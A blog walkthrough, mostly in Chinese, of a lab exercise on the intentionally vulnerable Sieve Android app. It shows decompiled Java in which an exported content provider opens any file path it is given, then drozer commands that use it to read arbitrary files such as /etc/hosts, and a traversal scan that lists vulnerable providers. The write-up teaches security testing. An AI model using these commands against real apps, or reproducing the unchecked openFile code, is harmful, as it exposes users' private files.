Test Sieve - content providers exported - File SystemBased

Posted on | Post modified | In |

Test Sieve - content providers exported - File SystemBased

  1. 有關於基於File System的Content Provider - 逆向 在com.mwr.example.sieve.FileBackupProvider中可以特別注意onCreate以及ParcelFileDescriptor這個funnction 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    		 
     public class FileBackupProvider extends ContentProvider {
     ...
     @Override // android.content.ContentProvider
     public boolean onCreate() {
         this.sUriMatcher.addURI("com.mwr.example.sieve.FileBackupProvider", "*", DATABASE);
         return false;
     }

     @Override // android.content.ContentProvider
     public ParcelFileDescriptor openFile(Uri uri, String mode) {
         int modeCode;
         if (mode.equals("r")) {
             modeCode = 268435456;
         } else if (mode.equals("rw")) {
             modeCode = 805306368;
         } else if (mode.equals("rwt")) {
             modeCode = 805306368;
         } else {
             Log.w(TAG, "Unrecognised code to open file: " + mode);
             return null;
         }
         try {
             return ParcelFileDescriptor.open(new File(uri.getPath()), modeCode);
         } catch (FileNotFoundException e) {
             Log.e(TAG, "ERROR: unable to open file: " + e.getMessage());
             return null;
         }
     }
  2. 實際讀取文件或是Path Traversal 為了測試他真的能夠讀取到特定文件,我在手機的Download創了一個secret.txt,不管是哪一個file,都可以正常讀取 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    		 
     $ echo "this is secret file" > /storage/emulated/0/Download/secret.txt
 dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/storage/emulated/0/Download/secret.txt
 Attempting to run shell module
 this is secret file

 dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
 Attempting to run shell module
 127.0.0.1       localhost
 ::1             ip6-localhost

    也可以利用drozer自動找尋path traversal的漏洞在哪裡

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    		 
     dz> run scanner.provider.traversal -a com.mwr.example.sieve
 Attempting to run shell module
 Scanning com.mwr.example.sieve...
 Not Vulnerable:
   content://com.mwr.example.sieve.DBContentProvider/Keys/
   content://com.mwr.example.sieve.DBContentProvider/Passwords
   content://com.mwr.example.sieve.DBContentProvider/Passwords/
   content://com.mwr.example.sieve.DBContentProvider/
   content://com.mwr.example.sieve.DBContentProvider/Keys
   content://com.mwr.example.sieve.DBContentProvider

 Vulnerable Providers:
   content://com.mwr.example.sieve.FileBackupProvider
   content://com.mwr.example.sieve.FileBackupProvider/